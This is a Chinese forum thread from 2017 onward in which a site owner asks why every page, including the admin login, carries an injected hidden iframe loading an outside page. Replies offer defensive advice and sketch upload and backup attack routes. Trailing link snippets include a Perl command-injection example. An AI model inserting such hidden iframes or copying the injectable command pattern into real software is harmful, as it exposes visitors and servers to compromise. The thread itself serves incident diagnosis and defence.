社区
ASP
帖子详情
网站被黑,求原因,被注入代码如下
kissgeek
2017-03-01 10:29:53
<iframe src=http://www.cctv916.com:555/shouj.htm width=100 height=0></iframe><html>
网站每个页面都有这个,包括后台登录页面。求大神解答
...全文
4044
31
打赏
收藏
网站被黑,求原因,被注入代码如下
网站每个页面都有这个,包括后台登录页面。求大神解答
复制链接
扫一扫
分享
转发到动态
举报
写回复
配置赞助广告
用AI写文章
31 条
回复
切换为时间正序
请发表友善的回复…
发表回复
打赏红包
大瓶药水
2019-02-25
打赏
举报
回复
被注入了,看日志吧
amotenjf
2019-02-03
打赏
举报
回复
如果网站是用的开源的程序,最好能自己改改敏感文件的命名方式,尽可能的在正常可访问的页面中隐藏敏感的页面(比如上传类,后台登陆,数据库备份功能,富文本编辑器-尽量别暴漏,原开源程序中有而目前用不到的页面尽可能删掉)。个人之前ASP经常被干,都干出阴影了,程序上的漏洞无法一一修复,只能在被黑难度上下功夫,祝你好运。
amotenjf
2019-02-03
打赏
举报
回复
可以判断是批量写进去的,没准asp木马还在站点中,检查有没有未知文件,多数这种漏洞都是上传方面,首先是编辑器漏洞,编辑器文件图片上传,第二就是无组件上传类漏洞,被利用用于上传恶意文件(例如一句话图片木马),再就是asp数据库备份漏洞,可以将伪装成图片格式的文件备份成可执行文件(.asp、.asa),网站如果没有做防注入措施,容易被人暴库,从而知道网站后台用户名密码,进一步了解网站结构,如果能做好防注入措施,再没有用开源或者大幅度调整过文件命名的情况下,菜鸟黑客还是拿你没办法的,对方不了解,也没有地方窥探网站文件结构,单靠软件去试着找上传或者漏洞入口,所浪费的时间,还不如放弃换个站搞。
ziyuanxian
2018-06-20
打赏
举报
回复
装个安全狗,看看是从哪个网页注入或上传的,最好post或者get过滤下sql关键字,更安全点。你这个已经被修改了,先清除代码,然后。找安全漏洞,装个安全狗,看看是从哪个网页注入或上传的
「已注销」
2018-06-17
打赏
举报
回复
求注入方法!
学习a123456
2018-05-14
打赏
举报
回复
服务器本身没有设置好,有安全软件可以让文件不许浏览器访问方式修改
Tanyz
2018-04-07
打赏
举报
回复
360官方有提供一个防注入的模块,你可以找找,插入自己的代码中就行了。
Tiny~
2018-03-21
打赏
举报
回复
要么是sql注入,这个你可以加判断代码,如果是能控制的云主机或者VPS、单独的服务器,最简单的办法安装服务器狗试试 要么就是最常见的,上传组件有问题。比方说你后台编辑器的上传组件,或者你添加到后台的其他上传文件的无组件上传类,如果本身就有漏洞,你又没有至少添加下session验证在相关文件里面,最容易中招……
阿三阿四一起来
2017-11-18
打赏
举报
回复
这个应该是SQL注入造成的,做一下SQL注入防护或加强上传文件的检测权限
区区小爱
2017-11-16
打赏
举报
回复
你的是不是服务器问题?
liminhao520
2017-11-16
打赏
举报
回复
检查服务器,重新搭建环境
什么都不能
2017-11-15
打赏
举报
回复
1.检查sql注入 2.检查木马文件 3.你的站点是不是放到租用的空间里?还要看看是不是被旁注了。
lifewell1
2017-10-17
打赏
举报
回复
输入框防代码注入
sspanzervor1
2017-10-16
打赏
举报
回复
最根本的解决办法是要装个服务器防火墙
gtr
2017-10-16
打赏
举报
回复
检查一下代码的漏洞。建议不要用人家的代码,
jilongkeng1819
2017-05-04
打赏
举报
回复
11111111111
小伙真帅
2017-05-03
打赏
举报
回复
SQL注入,上传,权限控制. 简单后台地址或帐号密码, 服务器沦陷. 代码中本身就还存在马儿没清干净. 说实话,太多太多.
Rotel-刘志东
2017-04-14
打赏
举报
回复
代码层面是否做了sql过滤
chinashiji
2017-04-14
打赏
举报
回复
sql注入,确定就这个原因
chx090909
2017-04-06
打赏
举报
回复
编辑器漏洞?上传漏洞?基本上多半都是上传漏洞。。。 把放上传文件的文件夹的运行脚本程序功能去掉试试?
加载更多回复(11)
解决TP5项目被恶意篡改、
注入
代码
问题
解决TP5项目被恶意篡改、
注入
代码
问题 首先,谈谈这个曲折的经历! 第一次,被人用eval()函数
注入
了文件,发现后,我就禁了这些PHP高危险函数! 第二次,就是被人在入口文件中
注入
了
代码
,在public文件夹中,多出了很多文件。然后我就修改了宝塔面板的密码,加上下面的第2步,目前暂时没有被
注入
了,希望能帮到大家! 如果还有更好的办法,希望不吝赐教,留下你宝贵的经验,万分感谢! 1、禁掉高危险函数:eval、phpinfo这2个函数必须禁掉! (1)...
代码
注入
(web安全入门)
不少知名程序也用到了动态函数的写法,这种写法跟使用 call_user_func() 的初衷一样,用来更加方便的调用函数,但是一旦过滤不严格就会造成
代码
执行漏洞。call_user_func() 等函数都有调用其他函数的功能,其中一个参数作为要调用的函数名,那如果这个传入的函数名可控,那就可以调用以外的函数来执行我们想要的
代码
,也就是存在任意
代码
执行漏洞。我们可以利用 file_get_contents() 函数读取服务器任意文件,前提是知道文件的绝对路径(也可是相对路径)和读取权限。
JAVA
代码
审计篇-SQL
注入
JAVA
代码
审计篇-SQL
注入
怎么看
网站
是否被
黑
防止
网站
被
黑
网站
被
黑
,打开
网站
竟然跳转到博cai
网站
上去了,一开始以为自己看错了,多次从百度点击自己
网站
进去,还是会跳转到彩piao
网站
上,第一反应是自己的
网站
被
黑
了,经营
网站
很多年了,从来未遇到过这种情况。 先来看下
网站
被
黑
的情况,从百度里输入自己的
网站
域名,发现自己
网站
的快照被改成什么北京sai车,北京pk10等等内容,还被百度提示,说什么百度网址安全中心提醒您:该页面可能已被非法篡改!搞的我头都大了,...
代码
注入
漏洞介绍和修复参考
代码
注入
Shell
注入
我们先来看一段perl的
代码
: use CGI qw(:standard); $name = param('name'); $nslookup = "/path/to/nslookup"; print header; if (open($fh, "$nslookup $name|")) { while ()
ASP
28,390
社区成员
357,068
社区内容
发帖
与我相关
我的任务
ASP
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
复制链接
扫一扫
分享
社区描述
ASP即Active Server Pages,是Microsoft公司开发的服务器端脚本环境。
社区管理员
加入社区
获取链接或二维码
近7日
近30日
至今
加载中
查看更多榜单
社区公告
暂无公告
试试用AI创作助手写篇文章吧
+ 用AI写文章